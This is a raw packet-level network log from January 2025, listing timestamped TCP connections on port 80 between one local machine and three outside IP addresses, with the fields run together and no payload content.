                                                                                                                                                                              Jan 11, 2025 03:58:12.216336012 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216372967 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216399908 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216536999 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.216578960 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:13.555643082 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.571835041 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.743038893 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.743304968 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.746936083 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.746969938 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.747036934 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.918385029 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918526888 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918548107 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918975115 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918992043 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.919003010 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.919136047 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.274321079 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.445897102 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.446074009 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.448467016 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.619719982 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620135069 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620177984 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620209932 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620503902 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.621155024 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.792496920 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.095151901 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.319633007 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.319838047 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.323421001 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.546035051 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737550974 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737627983 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737677097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737732887 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737782955 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737849951 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.737914085 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738063097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738136053 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738178968 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738277912 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738385916 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738400936 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738449097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738693953 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.960829973 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.960913897 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.960958004 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961019993 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961080074 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961215019 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961289883 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961364985 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961406946 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961544037 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961553097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961664915 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961734056 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961781025 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961894035 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961961985 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961994886 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962116957 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962178946 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962292910 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962341070 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962461948 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962527037 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962591887 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962666988 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962687016 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962806940 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962865114 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962924004 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.963115931 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184048891 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184082031 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184225082 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184251070 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184348106 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184497118 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184593916 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184606075 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184679985 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184794903 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184856892 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184907913 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185029984 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185034037 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.185169935 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185204029 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.185260057 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185370922 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185467005 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.185487032 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185596943 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185719013 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185725927 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.185775995 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.185882092 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.185983896 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.834494114 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:25.850601912 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.073344946 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.073491096 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.077445984 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.299951077 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487404108 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487478018 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487521887 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487585068 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487633944 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487679958 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.487799883 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.487924099 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.487998009 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.488042116 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.488101959 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.488171101 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.488215923 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.488256931 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.488533974 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.710719109 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.710793972 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.710838079 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.710913897 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.710942030 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.711093903 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711154938 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711160898 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.711297035 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711335897 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.711416960 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711532116 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711596012 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.711669922 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711730003 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711849928 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.711870909 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.711960077 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712013960 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.712140083 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712199926 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712336063 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712337971 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.712493896 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712555885 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712594032 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.712666988 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712776899 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.712779999 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.712961912 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.933933973 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934007883 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934068918 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934113979 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934235096 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.934263945 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934330940 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934413910 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.934467077 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934578896 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934607029 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.934781075 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.934839964 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934927940 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.934978008 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935036898 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935125113 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.935244083 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935264111 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.935293913 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935416937 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935493946 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:26.935555935 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935596943 CET8049804134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:26.935833931 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:27.583825111 CET4980480192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:28.599997044 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:28.822566986 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:28.822833061 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:28.826461077 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:28.826493025 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.048922062 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.049144983 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.049598932 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.049810886 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.049825907 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262090921 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262186050 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262290001 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262336969 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262371063 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262424946 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.262473106 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262485027 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.262614965 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262686014 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.262728930 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262844086 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262969017 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.262979984 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.263278008 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.485019922 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485121965 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485238075 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485354900 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485361099 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.485446930 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485614061 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485639095 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.485667944 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485778093 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485804081 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.485918045 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.485974073 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.486011028 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486130953 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486183882 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.486301899 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486362934 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486479998 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486493111 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.486605883 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486649036 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.486762047 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486830950 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486953020 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.486987114 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.487099886 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.487179995 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.487185001 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.487432957 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708146095 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708225012 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708297968 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708339930 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708472967 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708481073 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708517075 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708547115 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708697081 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708734989 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708808899 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708914995 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708997011 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709079027 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709141016 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709261894 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709264994 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709477901 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709522963 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709599018 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709641933 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709810019 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709845066 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709847927 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.710099936 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:30.333280087 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.349498034 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.572200060 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.572381020 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.574815989 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.797348976 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.954672098 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.954969883 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.955137014 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.955806017 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:32.178188086 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.301539898 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.439331055 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.439640999 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.443126917 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.580456972 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.580468893 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.580625057 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:39.956140041 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:40.972269058 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:41.986325979 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.122028112 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.122250080 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.125760078 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.261383057 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.261393070 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.261542082 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:43.627271891 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:44.643367052 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.657409906 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.794184923 CET804980913.248.169.48192.168.11.20
